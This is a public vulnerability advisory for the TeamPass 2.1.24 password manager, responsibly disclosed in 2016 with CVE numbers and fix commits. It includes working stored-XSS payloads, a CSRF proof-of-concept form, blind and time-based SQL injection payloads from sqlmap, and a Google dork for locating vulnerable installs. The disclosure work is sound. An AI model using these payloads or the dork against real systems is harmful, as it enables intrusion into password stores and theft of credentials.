Skip to content
cyberexploits
webappphptext

TeamPass 2.1.24 - Multiple Vulnerabilities

TeamPass 2.1.24 - Multiple Vulnerabilities

Published on 2016-03-14

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/php/webapps/39559.txt7eac4c3a
raw
Affected Product:    TeamPass

Vulnerability Type:  	Multiple XSS,CSRF, SQL injections

Fixed in Version:	2.1.25 (https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.25.0)

Vendor Website:      	http://www.teampass.net

Software Link: : 	https://github.com/nilsteampassnet/TeamPass

Affected Version:	2.1.24 and prior 

Vulnerable software (including source) : https://github.com/nilsteampassnet/TeamPass/releases/tag/2.1.24.4

Google Dork: intitle:"Teampass" + inurl:index.php?page=items

Tested on: Ubuntu

Remote Exploitable:  Yes

Reported to vendor:  30 december 2015

Disclosed to public: 14 March 2016

Release mode:        Responsible Disclosure

CVE-2015-7562 TeamPass 2.1.24 Persistant XSS 

CVE-2015-7563 TeamPass 2.1.24 CSRF 

CVE-2015-7564 TeamPass 2.1.24 SQL Injection 

Credits:              Vincent Malguy





Description :

TeamPass is a Passwords Manager dedicated for managing passwords in a collaborative way on any server Apache, MySQL and PHP. It is especially designed to provide passwords access security for allowed people. This makes TeamPass really useful in a Business/Enterprise environment and will provide to IT or Team Manager a powerful and easy tool for customizing passwords access depending on the user’s role. 

Copyright (c) 2009-2015, Nils Laumaillé



********************* CVE-2015-7562 TeamPass 2.1.24 Persistant XSS  *********************

When displaying the detail of an item (a password entry), the "label" value is display using the stripslashes() sanitization function. This function does not efficiently  prevent XSS.

POC of a persistant XSS : add  item with label : $str = "' onclick='javascript:alert("XSS found");' alt='";echo "<a href='". strip_tags($str) ."'></a>";

This xss will be trigger each time a user click on this item. 

As item can be share, there is a way for a user to trick an admin to trigger this xss.

fix in commit cd112ea (see https://github.com/nilsteampassnet/TeamPass/pull/1140)



POC of a persistant XSS : 

Add a new role with name  : <script>alert("XSS");</script> 

This xss will be trigger in many admin pages

Fix in commit : 3f0a6c9 & e29cd54 & 295cada & 2c8a829 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)



********************* CVE-2015-7563 TeamPass 2.1.24 CSRF  *********************

Lack of anti-CSRF token lead to security vulnerabilities where an attacker can trick a authenticated user to do some unwanted action on his behalf :



<form action="http://<teampass host>/sources/main.queries.php" method="post">

    <select name="type">

    <option value="increase_session_time »>will add 1 hour timeout to the user session</option>

</select>

    <input type=submit>

  </form> 

  

recommanded fix: add anti-CSRF token.



********************* CVE-2015-7564 TeamPass 2.1.24 SQL Injections   *********************

SQL injection has been found in item.query.php parameter id with type set to action_on_quick_icon.

Sqlmap output  :

---

Parameter: id (POST)

Type: boolean-based blind

Title: MySQL >= 5.0 boolean-based blind - Parameter replace

Payload: type=action_on_quick_icon&id=(SELECT (CASE WHEN (6144=6144) THEN 6144 ELSE 6144*(SELECT 6144 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&action=1


 fix in commit 795256f (see https://github.com/nilsteampassnet/TeamPass/pull/1140)





SQL injections has been found in view.query.php in parameters order and direction with type set to connections_logs, errors_logs or access_logs .

Note that direction need to be prefixed by ", "  in order to be exploitable

Sqlmap output  for connections_logs:

---

Parameter: order (POST)

    Type: boolean-based blind

    Title: MySQL >= 5.0 boolean-based blind - Parameter replace

    Payload: type=connections_logs&order=(SELECT (CASE WHEN (6688=6688) THEN 6688 ELSE 6688*(SELECT 6688 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&direction=DESC



    Type: AND/OR time-based blind

    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)

    Payload: type=connections_logs&order=date AND (SELECT * FROM (SELECT(SLEEP(5)))vhPw)&direction=DESC




---

Parameter: direction (POST)

   Type: boolean-based blind

   Title: MySQL >= 5.0 boolean-based blind - Parameter replace

   Payload: type=errors_logs&order=date&direction=,  (SELECT (CASE WHEN (1739=1739) THEN 1739 ELSE 1739*(SELECT 1739 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))


fix commit 86719e0 (see https://github.com/nilsteampassnet/TeamPass/pull/1140)
View on GitHub